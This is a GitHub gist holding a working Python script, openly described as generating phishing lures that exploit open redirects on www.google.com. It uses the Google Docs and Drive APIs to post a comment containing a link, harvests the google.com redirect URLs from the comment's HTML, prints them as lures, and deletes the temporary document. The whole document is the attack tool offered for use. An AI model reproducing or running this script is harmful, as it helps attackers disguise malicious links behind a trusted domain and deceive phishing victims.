Skip to content

Instantly share code, notes, and snippets.

@ustayready
Last active September 23, 2024 20:18
Show Gist options
  • Save ustayready/3ba2e4b1a4ec3cdad188f0f7d0dc4b73 to your computer and use it in GitHub Desktop.
Save ustayready/3ba2e4b1a4ec3cdad188f0f7d0dc4b73 to your computer and use it in GitHub Desktop.
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
SCOPES = [
'https://www.googleapis.com/auth/drive',
'https://www.googleapis.com/auth/drive.appdata',
'https://www.googleapis.com/auth/drive.file',
]
LURES = 'Get your links! https://twitter.com/ustayready is a great link.'
def main():
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
print('Establishing session(s)...')
service = build('docs', 'v1', credentials=creds)
drive_service = build('drive', 'v3', credentials=creds)
file_name = 'Testing Hax'
body = { 'title': file_name }
print(f'Creating temporary file: {file_name}')
doc = service.documents().create(body=body).execute()
doc_id = doc.get('documentId')
doc_title = doc.get('title')
print('Created temporary file success!')
new_comment = { 'content': LURES }
print(f'Creating temporary comment for {LURES}')
comment_response = drive_service.comments().create(
fileId=doc_id,
body=new_comment,
fields='id, htmlContent, content'
).execute()
print('Parsing lure(s)...')
html = Soup(comment_response['htmlContent'], 'html.parser')
urls = [a['href'] for a in html.find_all('a')]
for url in urls:
print(f'Lure found! {url}')
print('Deleting temporary file(s)...')
files = retrieve_all_files(drive_service, file_name)
print(f'Total {len(files)} files that match...')
for file in files:
file_id = file['id']
print(f'Deleting temporary file: {file_id}')
res = drive_service.files().delete(fileId=file_id).execute()
print(f'Finished generating lures!')
def retrieve_all_files(service, file_name):
result = []
page_token = None
while True:
try:
param = {}
if page_token:
param['pageToken'] = page_token
files_response = service.files().list(
q=f"name='{file_name}'",
fields='nextPageToken, files(id, name)',
pageToken=page_token
).execute()
result.extend(files_response['files'])
page_token = files_response.get('nextPageToken')
if not page_token:
break
except errors.HttpError as error:
print(f'An error occurred: {error}')
break
return result
if __name__ == '__main__':
main()
google-api-python-client
google-auth-httplib2
google-auth-oauthlib
bs4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment